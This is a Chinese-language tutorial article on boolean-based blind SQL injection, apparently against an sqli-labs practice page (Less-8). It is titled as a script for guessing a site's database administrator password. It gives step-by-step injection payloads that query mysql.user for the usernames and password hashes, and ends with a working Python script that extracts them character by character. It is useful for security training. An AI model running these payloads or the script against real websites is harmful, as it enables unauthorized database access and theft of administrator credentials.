Python猜解網(wǎng)站數(shù)據(jù)庫管理員密碼的腳本

更新時間：2022年02月18日 10:07:19 作者：士別三日wyx

這篇文章主要和大家分享一個Python腳本，可以實現(xiàn)猜解網(wǎng)站數(shù)據(jù)庫管理員的密碼。文中的示例代碼講解詳細，需要的小伙伴可以參考一下

一、功能分析

簡單分析一下網(wǎng)站的功能，大致如下：

需要用戶在地址欄中提交參數(shù)，根據(jù)參數(shù)中的id查詢對應的用戶信息。

如果id存在，則顯示查詢成功，比如輸入?id=1

如果id不存在，則頁面空顯示，比如輸入 ?id=0（用戶id不能是0或負數(shù)，id為0時，查詢結(jié)果為空，會導致頁面空顯示）

如果數(shù)據(jù)庫報錯，頁面也是空顯示，比如輸入?id=1’ 或 ?id=1"(參數(shù)中攜帶引號會導致數(shù)據(jù)庫報錯，前提是后臺代碼未過濾單引號)

二、思路分析

頁面沒有顯示位，不適合聯(lián)合注入。

沒有數(shù)據(jù)庫的報錯信息，不適合使用報錯注入。

只有正確和錯誤兩種情況，推薦使用布爾盲注。

網(wǎng)站沒有過濾參數(shù)，不需要繞過，盲注的時間復雜度較高，文末提供Python腳本。

三、步驟實現(xiàn)

1）判斷注入點

輸入?yún)?shù) ?id=1’，頁面空顯示，說明單引號被數(shù)據(jù)庫識別，導致數(shù)據(jù)庫報錯。

輸入?yún)?shù) ?id=1"，頁面正常顯示查詢成功，說明雙引號未被數(shù)據(jù)庫識別；1" 被數(shù)據(jù)庫識別成了 1，實際查詢了id為1的用戶。

單引號可以識別，雙引號不被識別，初步判斷：網(wǎng)站的注入點是單引號，下面使用萬能賬號進一步驗證。

輸入 ?id=1’ and 1 – a，頁面正常顯示，查詢成功。

輸入 ?id=1’ and 0 – a，頁面空顯示，未查詢到。

人為構造參數(shù)可以使頁面產(chǎn)生對應的變化，由此判斷，網(wǎng)站存在注入，注入點為單引號字符型注入。

2）猜解長度

輸入?yún)?shù) ?id=1’ and length(“abc”)>1 – a，頁面正常顯示查詢成功。

length(“abc”)可以計算出字符串“abc”的長度，長度為3。

length(“abc”)>1 結(jié)果為 true，因此，參數(shù)等價于 ?id=1’ and 1 – a。

輸入?yún)?shù) ?id=1’ and length(“abc”)<1 – a，頁面空顯示。

length(“abc”)<1 結(jié)果為 false，參數(shù)等價于 ?id=1’ and 0 – a。

由此可以推斷出，長度函數(shù)未被過濾，可以正常使用，接下來我們開始猜解數(shù)據(jù)庫管理員密碼的長度。

mysql.user表用來存放數(shù)據(jù)庫的用戶名和密碼等信息，我們查詢這個表即可。

輸入以下payload：

?id=1' and length(
    (select group_concat(user,password)
    from mysql.user)
)=1 -- a

我們先假設用戶名和密碼的總長度為1，結(jié)果肯定是空顯示，我們將測試長度依次遞增，測試2到n，當測試長度遞增到42時，頁面正常顯示，由此可判斷用戶名和密碼的總長度為42，payload如下：

?id=1' and length(
    (select group_concat(user,password)
    from mysql.user)
)=42 -- a

3）猜解數(shù)據(jù)

長度確定后，我們從第一個字符開始，猜解出完整的數(shù)據(jù)。

ASCLL碼表中包含了字符的所有可能性（字母、數(shù)字或特殊符號），ASCLL總共127個字符，其中可輸入的字符只有32~126，我們窮舉每一種可能性，即可猜解出

完整的數(shù)據(jù)。

我們先假設第一個字符的ASCLL碼是32，payload如下：

?id=1' and ascii(substr(
    (select group_concat(user,password)
    from mysql.user)
,1,1))=32 -- a

頁面空顯示說明錯誤，我們從32開始遞增至126，當頁面正常顯示時（出現(xiàn) You are in……），說明猜解正確。

4）猜解腳本

使用盲注時，手動猜解時間成本太大，推薦使用Python猜解，腳本如下：

import requests

# 只需要修改url 和 兩個payload即可
# 目標網(wǎng)址（不帶參數(shù)）
url = "http://a30842672c28473a956dc5ae3233d655.app.mituan.zone/Less-8"
# 猜解長度使用的payload
payload_len = """?id=1' and length((
                    select group_concat(user,password)
                    from mysql.user
                ))={n} -- a"""
# 枚舉字符使用的payload
payload_str = """?id=1' and ascii(substr((
                    select group_concat(user,password)
                    from mysql.user
                ),{n},1))={r} -- a  """

# 獲取長度
def getLength(url, payload):
    length = 1  # 初始測試長度為1
    while True:
        response = requests.get(url= url+payload_len.format(n= length))
        # 頁面中出現(xiàn)此內(nèi)容則表示成功
        if 'You are in...........' in response.text:
            print('測試長度完成，長度為：', length)
            return length;
        else:
            print('正在測試長度：',length)
            length += 1  # 測試長度遞增

# 獲取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/庫名為空
    for l in range(1, length+1):
        for n in range(33, 126):
            response = requests.get(url= url+payload_str.format(n= l, r= n))
            if 'You are in...........' in response.text:
                str+= chr(n)
                print('第', l, '個字符猜解成功：', str)
                break;
    return str;

# 開始猜解
getStr(url, payload_str, getLength(url, payload_len))

腳本猜解結(jié)果如下，成功猜解root用戶密碼：